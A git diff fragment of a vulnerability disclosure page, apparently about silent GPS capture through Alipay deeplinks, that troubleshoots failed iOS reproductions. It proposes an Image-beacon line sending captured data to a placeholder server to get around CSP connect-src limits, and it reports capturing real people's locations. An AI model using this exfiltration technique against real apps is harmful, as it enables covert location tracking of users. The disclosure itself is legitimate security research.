<p>freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.</p> <p>freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.</p>
<p><strong>Possible causes:</strong></p> <p><strong>Possible causes:</strong></p>
<ul> <ul>
<li><strong>Domain/HTTPS configuration</strong> — iOS WKWebView enforces stricter mixed content and CORS policies; PoC server needs valid HTTPS certificate with correct CORS headers</li> <li><strong>HTTPS mixed content blocking</strong> — If the PoC page loads in Alipay's HTTPS WebView but the exfiltration target is HTTP, WKWebView will block the request entirely (this blocks the request itself, not just the response)</li>
<li><strong>CSP connect-src restriction</strong> — Alipay's WebView may set CSP <code>connect-src</code> directives that block requests to external domains</li>
<li><strong>Solution</strong> — Use Image beacon (<code>new Image().src = "https://server/log?data=..."</code>) which is a simple request not restricted by <code>connect-src</code></li>
<li><strong>Alipay version differences</strong> — Different versions may have different JSBridge authentication policies; test with the latest version</li> <li><strong>Alipay version differences</strong> — Different versions may have different JSBridge authentication policies; test with the latest version</li>
<li><strong>CSP (Content Security Policy)</strong> — Stricter CSP headers on iOS may restrict external requests</li>
</ul> </ul>
<p style="color:#9898a8;font-size:13px;"><em>Technical correction: Thanks to <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060931030" target="_blank">meooxx</a> for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.</em></p>
<p><strong>Key fact:</strong> Our iPhone 16 Pro (iOS 18.3) test <strong>did successfully</strong> obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.</p> <p><strong>Key fact:</strong> Our iPhone 16 Pro (iOS 18.3) test <strong>did successfully</strong> obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.</p>
<p>We will provide a detailed iOS reproduction troubleshooting guide in <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a>.</p> <p>We will provide a detailed iOS reproduction troubleshooting guide in <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a>.</p>
</div> </div>
@@ -2637,23 +2608,7 @@ Language/zh-Hant Region/CN</code></pre>
</div> </div>
</section> </section>
<!-- ==================== ARCHIVE MIRRORS FOOTER ==================== -->
<div style="max-width:860px;margin:0 auto;padding:0 24px 32px;">
<div style="background:rgba(255,68,68,.06);border:2px solid #ff4444;border-radius:12px;padding:20px 24px;text-align:center;">
<h3 style="color:#ff4444;font-size:15px;margin-bottom:10px;">
<span class="zh">📌 存档地址 (防删除)</span>
<span class="en">📌 Archive Mirrors (Anti-Deletion)</span>
</h3>
<div style="display:flex;flex-wrap:wrap;justify-content:center;gap:10px;margin-bottom:10px;">
<a href="https://innora.ai/zfb/" style="display:inline-block;padding:6px 16px;background:#ff4444;color:#fff;border-radius:6px;font-weight:700;font-size:13px;text-decoration:none;">innora.ai/zfb</a>
<a href="https://github.com/sgInnora/alipay-deeplink-research" target="_blank" style="display:inline-block;padding:6px 16px;background:#24292e;color:#fff;border-radius:6px;font-weight:700;font-size:13px;text-decoration:none;">GitHub</a>
</div>
<p style="color:#888;font-size:11px;margin:0;">
<span class="zh">请 Fork / 下载备份。如发现任一地址不可访问,请从其他节点获取完整内容。</span>
<span class="en">Please Fork / download as backup. If any mirror becomes unavailable, access the full content from other nodes.</span>
</p>
</div>
</div>
<!-- ==================== FOOTER ==================== --> <!-- ==================== FOOTER ==================== -->
<footer> <footer>

BIN
wechat_censored_1.jpeg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 209 KiB

BIN
wechat_censored_2.jpeg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 200 KiB